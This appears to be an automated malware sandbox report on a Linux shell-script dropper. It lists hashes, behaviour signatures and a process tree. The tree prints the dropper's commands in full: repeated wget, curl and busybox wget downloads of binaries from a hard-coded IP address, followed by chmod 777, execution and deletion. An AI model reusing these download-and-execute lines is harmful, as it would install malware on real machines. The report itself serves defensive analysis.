Analysis
-
max time kernel
12s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1532 chmod 1544 chmod 1568 chmod 1652 chmod 1676 chmod 1604 chmod 1610 chmod 1646 chmod 1670 chmod 1634 chmod 1664 chmod 1538 chmod 1550 chmod 1586 chmod 1592 chmod 1598 chmod 1520 chmod 1526 chmod 1580 chmod 1622 chmod 1628 chmod 1640 chmod 1658 chmod 1682 chmod 1556 chmod 1562 chmod 1574 chmod 1616 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 1521 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 1527 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 1533 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 1539 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 1545 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 1551 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 1557 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 1563 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 1569 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 1575 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 1581 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 1587 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 1593 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 1599 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 1605 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 1611 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 1617 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 1623 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 1629 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 1635 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 1641 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 1647 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 1653 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 1659 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 1665 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 1671 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 1677 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 1683 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:1511
-
/bin/rm/bin/rm bins.sh2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1519
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1525
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1531
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1537
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1543
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1549
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1555
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1561
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1567
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1573
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1579
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1585
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1591
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1597
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1603
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1609
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1615
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1621
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1627
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1633
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1639
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1645
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1651
-
-
